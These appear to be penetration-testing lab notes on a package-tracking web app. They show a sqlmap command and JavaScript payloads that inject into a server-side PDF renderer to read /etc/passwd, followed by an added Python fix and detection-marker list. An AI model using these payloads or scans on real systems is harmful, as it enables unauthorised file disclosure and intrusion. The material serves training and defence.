## `tracking.inlanefreight.local`

- only functionality looks like entry of a tracking number
  ![[images/Pasted image 20260628161924.png]]
- random entry: `dfsdfsdfds` entered as part of a POST request and returned a PDF
  ![[images/Pasted image 20260628195223.png]]
- `request:response` in burp
  ![[images/Pasted image 20260628195303.png]]

### SQLi

- try `sqlmap` on `insert` parameter
  ![[images/Pasted image 20260628201022.png]]
- try again without an injection point

```bash
sqlmap -r tracking.req --batch --level=5 --risk=3
```

- possible SQLi on `handle` parameter
  ![[images/Pasted image 20260628212043.png]]
- mark injection point and limit to boolean-based blind
- super slow

### fuzzing

- directory
  ![[images/Pasted image 20260630171736.png]]
- page
  ![[images/Pasted image 20260630171857.png]]

### testing

- whatever I enter in the tracking field shows up in the PDF output, e.g. `test`
  ![[images/Pasted image 20260630171057.png]]
- if I try `test"<script>alert(window.origin)</script>` the script portion is cut off
  ![[images/Pasted image 20260630171848.png]]
- if I try `test"<plaintext>` I get an interesting output
  ![[images/Pasted image 20260630172010.png]]
- it must be executing the javascript
- Google: "pdf injection file read"
- try this payload for XHR/javascript execution in DOM

> not getting what I expected

```html
<script>
xhr = new XMLHttpRequest();
xhr.onload = function() {
  // Send responseText to attacker-controlled server
};
xhr.open("GET", "file:///etc/passwd");
xhr.send();
</script>
```

![[images/Pasted image 20260630185144.png]]

- try a modified payload

> the above has a blank placeholder

```html
<script>
var xhr = new XMLHttpRequest();
xhr.onload = function() {
  document.write(this.responseText);
};
xhr.open("GET", "file:///etc/passwd", false);
xhr.send();
</script>
```

- there we go
  ![[images/Pasted image 20260630192013.png]]
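Added defender-side example (not part of these notes and not the target application's code): the reflection seen in the testing section is what raw interpolation of the tracking value into the HTML handed to the PDF renderer looks like. The Python below is a constructed server-side shape of the fix, assuming a hypothetical HTML template and a hypothetical tracking-number format; it validates the value, HTML-escapes it before templating, keeps the unsafe version beside it for comparison, and flags submissions carrying the markers that appear in these notes so they can be logged or alerted on.

```python
import html
import re

# Assumption: tracking numbers are short alphanumerics (plus '-'); the real
# application's format is not known from the notes.
TRACKING_RE = re.compile(r"^[A-Za-z0-9-]{1,32}$")

# Constructed minimal template standing in for whatever the application
# passes to its HTML-to-PDF renderer.
TEMPLATE = "<html><body><p>Tracking number: {value}</p></body></html>"

# Markers taken from the payloads observed in the notes; cheap to match
# server-side and useful as a logging/alerting signal.
SUSPICIOUS_MARKERS = ("<script", "<plaintext", "xmlhttprequest", "file:///")


def is_valid_tracking_number(value: str) -> bool:
    """Allowlist check: anything outside the expected format is rejected
    before it can reach the template at all."""
    return bool(TRACKING_RE.fullmatch(value))


def escape_for_template(value: str) -> str:
    """HTML-escape the user value. quote=True also converts " and ' so a
    value such as test"<plaintext> becomes inert text rather than markup."""
    return html.escape(value, quote=True)


def render_unsafe(value: str) -> str:
    """Constructed 'before' version: raw interpolation, which is the
    behaviour the notes observe (input shows up verbatim in the PDF)."""
    return TEMPLATE.format(value=value)


def render_tracking_html(value: str) -> str:
    """Hardened version: validate, then escape, then template."""
    if not is_valid_tracking_number(value):
        raise ValueError("tracking number has unexpected characters")
    return TEMPLATE.format(value=escape_for_template(value))


def looks_like_injection_attempt(value: str) -> bool:
    """Detection helper: True when a submitted value carries any of the
    markers seen in the notes' payloads (case-insensitive)."""
    lowered = value.lower()
    return any(marker in lowered for marker in SUSPICIOUS_MARKERS)


if __name__ == "__main__":
    # Constructed sample inputs: the benign value and the probe from the notes.
    for sample in ("dfsdfsdfds", 'test"<plaintext>'):
        print("unsafe   :", render_unsafe(sample))
        print("flagged  :", looks_like_injection_attempt(sample))
        try:
            print("hardened :", render_tracking_html(sample))
        except ValueError as exc:
            print("hardened : rejected ->", exc)
```

Escaping closes the markup injection; the file read in the notes additionally relies on the renderer executing JavaScript with `file://` access, so the renderer should also be configured with scripting and local file access disabled rather than relying on input handling alone.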